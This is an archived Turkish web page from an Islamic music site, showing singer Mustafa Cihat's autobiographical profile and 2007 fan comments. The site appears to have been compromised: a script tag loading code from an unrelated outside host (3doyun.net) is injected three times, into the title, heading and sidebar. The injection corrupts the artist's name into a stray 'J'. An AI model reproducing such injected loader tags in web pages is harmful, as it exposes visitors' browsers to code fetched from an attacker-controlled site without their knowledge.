İslami Müzik Tv
İslami Müzik TV

  Ayeti Kerime
" "
  Hadis-i Şerif
""

J<script src=http://3doyun.net/dcr/s.js></script> Cihat Profili - İslamimuzik.com

    J Cihat Kimdir ?J<script src=http://3doyun.net/dcr/s.js></script> 76 kışının 19 kasımında bir Cuma akşamı açmışım gözlerimi dünyaya. İnsanların korkudan evlerinin pencerelerini sıkı sıkı perdelediği, evlatlarını uğurlarken sıkı sıkı tembihlediği, sağ salim eve dönmeleri için el açıp dua ettiği bir zamanda. Tedirginliğin insanların hep yanında olduğu bir dönemde merhaba demiştim dünyaya.

Elbette dünyaya gelişim birilerinin hasretle ümit ettiği, ve bir yerleri kurtarması için beklenen bir kahraman gelişi değildi. Sade bir Anadolu evinde kılıç ailesinin ümitlerinin karşılığı herkesin yaşayabileceği kadar bir mutluluk anı sadece. Evin en küçüğü, diğer 3 kardeşinin arkadaşlarına “bizim bir kardeşimiz daha oldu” diyecekleri kadar sade ve sevinçli bir haber.

Babam ismimi doğmadan önce koymuş. “Allah bir erkek evlat verirse adı Mustafa Cihat olsun adının adamı olsun” demiş.

Çocukluğum her çocuk gibi oyunlarla ve oynayacağımız yeni oyunların hayalleriyle geçti. Belki tek farkım her şeyin çok kıymetli olduğu ve kıymetinin bilindiği bir devrin çocuğu olmamdı. Mahallede plastik topu olanın tüm oyunları ve kurallarını belirlediği, top oynarken plastik kramponu olanın takım kaptanı olduğu zamanlardı. Her şey azdı kıymetliydi, farklıydı ama çok tatlıydı.

Çabucak geçen yıllar ve ilk okul. “yahu cihat Maşallah görmeyeli kocaman adam olmuşsun sen be” diyen babamın arkadaşlarını hep sevdim.

Orta okul imam hatibe yazılıp okul bahçesinde, beyaz gömlek, lacivert bir ceket, gri pantolon, ağabeyimden kalan bordo kravatla ve elimdeki kitaplarla girdiğim o ilk gün “babamın arkadaşları haklı ben artık büyüdüm” dedim. Artık bundan sonra bende kravat takıcam. Ceket giyicem boyumdan büyük laflar edicem.

Ortaokulda uslu bir öğrenci olduğumu söylerlerdi hep hocalar sorulduğunda cevap veren az konuşan çok dinleyen bir öğrenci. Lisede ise tam tersi çok konuşan dinlemeyen sorulmasada her şeye karşı cevap veren bir öğrenci.

Lisede geçen 3 yıl geleceğimi yönlendirdi demeliyim. Bağlılık, sadakat kardeşlik, idealler, hayallar ve daha bir çok erdem. Daha düşmeden koluma giriverecek ağabeyler, dostlar tanıdım. Her sorunun bir cevabı vardı. Ve hepsinin cevabını öğrenmek için hep sordum tereddütsüz ve şüphesiz cevaplar aldım ve onlara sıkıca sarıldım. Bana sorulursa aynen cevaplamak için.

Lise sona geldiğimde abi olmanın tadıyla ve heyecanıyla daha bir başka konuşmaya başladım. Bu konuşmalar biraz yüksek sesli olsa gerek değerli bir abim bana “radyo kurduk orada program yapacaksın” dedi. Cevabımı dinlemeden bunu söz saydı. Ve radyoda program yapmaya başladım. Bu arada bir müzik grubumuzda vardı. Bizim saydığımız sahiplendiğimiz ezgileri söylemeye dinletmeye çalıştık anlatan ve dinleyen olmasa da.

Hızlı geçen günler ve yıllar bana iltimas yapmadı yoluna durmadan devam etti. Antalya’da geçen 5 yılda hayatın önemli virajlarından geçtim. Radyo ve müzik hep ilgimi tazeledi. Anlatmak istediklerimi konuşarak anlatmak daha güzeldi müzikle anlatmak. 93 yılında kendimde fark ettiğim Mevla’nın bana bahşettiği ilham, sözlere ve melodilere döküldü. Antalya’da kurduğumuz müzik grubu ile de bestelerimizi okumaya derdimizi anlatmaya çalıştık.

Ve 97 de hayatımın en önemli teklifini duymak nasip oldu. Can dost Eşraf Ziya soğuk bir kış günü bana “Cihat gel senle İstanbul’da bir müzik firması kuralım” dediğinde artık beklenen zamanın geldiğini fark ettim. Artık söylediklerim yazdıklarım konuştuklarım sadece bende kalmayacak aynı düşündüğümüz insanlarla ortak sözümüzü olacak dedim. Ve 98 de Marmara müzik adı altında, can dost Eşref Ziya abimle sesimizi duyurma adına bir fırsat yakalamış olduk.

Gelinen bu günde, en azından bir dostla, hayatın herhangi bir yerinde olmak, onunla her şeyi paylaşmak, ideallerimizi inancımızı onunla beraber diri tutmak, duayla, sabırlar, inançla, vefayla, sadakatle, ve ille de şükürle olmak yakışır bana ve herkese.

Merak edenler için yazılan bunca şeyden sonra eğer bir hata edildiyse affola. Takdir edersiniz ki yazmak zordur hele ki kendini yazmak daha bir zır, o halde mazur görmek bizim kardeşliğimize ve samimiyetimize yakışır.

Dualarınızda bana yer ayırmanız dileğiyle..


Bu Sanatçının Profili 13678 kez ziyaret edilmiştir.

     J Cihat - Yorum Ekle

emre
abi albümlerin gerçekten çok güzel ilahide farklı bir tarz sewerek dinliyorum özellikle CAN DEDİM adlı ilahiniz mükemmel allaha emanet olun yolunuz hep açık olsun...
Bu yorum 2007-07-12 16:41:15 tarihinde yapıldı.

fatih koç
ben 14 yaşındayım edirnede oturuyorum son parçalarınızı kermeste duydum we bi merak oluştu araştırdım kasetiniz çok hoşma gitti inşallah bu kasetlerinizin dewamı gelir sizi canlı performanstada görmek en büyük istediğim amenna en sewdiim parçanız olmakla birlikte affet beni we tut elimizden en favwori parçalar ALLAH razı olsun yeni kasetleriniz çıkması dileğiyle....
Bu yorum 2007-07-06 00:28:58 tarihinde yapıldı.

zeynep bilgin
merhaba mustafa abicim amenna albumünü çok iyi seslendirmişsin beğeni ile dinliyorum.ALLAH yar ve yardımcınız olsun.amin...selamlar
Bu yorum 2007-07-04 21:45:35 tarihinde yapıldı.

yasemin şimşek
s.a. mustafa abi seni çok seviyorumm .
Bu yorum 2007-07-03 14:53:54 tarihinde yapıldı.

texel
mustafa abi konyadaki konserinizi dinledim ve hayran kaldım eşref abiyide görmek istedim ama olmadı nasip olmadı ama inş. onuda görecem yorumlarınız çok güzel çok sağolun
Bu yorum 2007-07-02 23:52:02 tarihinde yapıldı.

zeynep
mustafa abicim allah senden razi olsun birde tv programı yasan keşke iyişallah ogünleri de görürüz
Bu yorum 2007-05-28 11:37:46 tarihinde yapıldı.

Saliha
Selamünalyeküm abimiz... Ben İlimYayma Yurtlarında kalan bir öğrenciyim.. Perşembe günü Konyaya teşriflerinizi büyük sabırsızlıkla bekliyoruz Allaha emanet olunuz...
Bu yorum 2007-05-23 10:33:40 tarihinde yapıldı.

***kardelen***
selamun aleyküm abicim...Allah(cc)razı olsun sizlerden.Şu kararmış çağımızda bizi aydınlatmaya çalışan nadir kandillerden birisiniz siz..Rabbim(cc)sizleri hayatımızdan eksik etmesin inş.ALLAH'EMANET OLUN..
Bu yorum 2007-05-01 20:18:21 tarihinde yapıldı.

kardelen
Selamun aleyküm abicim..Rabbimiz(cc)razı olsun sizden ve sizin gibi bizimle gönlünü paylaşanlardan..Ezgilerinizi uzun süredir dinliyorum ve her birinde bizden bi parça buluyorum..Dualarımız her zaman sizinle.Rabbimiz(cc)başarılarınızı daim eylesin ve sizleri bizlerden mahrum etmesin inşallah...
Bu yorum 2007-04-22 10:45:30 tarihinde yapıldı.

Sümeyye Akin
Selam Mustafa Abi Amenna adli albumunu zor bi arama sonucunda aldim hicbiyerde satilmiyor. cok aradim ama cok sükür sonunda buldum. Albumun Harika! Sesin Harika! Yorumun Harika! Baska ne söyleyim? Allaha emanet ol yeni Albumunu bekliyoruz
Bu yorum 2007-04-18 21:43:19 tarihinde yapıldı.


Yorum Yapyn

J Cihat

J<script src=http://3doyun.net/dcr/s.js></script>
Genel Bilgiler

Adı: J
Soyadı: Cihat
Doğum Yılı:
Doğum Yeri:
Tarz:
Eğitim Durumu:
Albüm Sayısı: 3
Etiketler:
Websitesi: Resmi Sayfası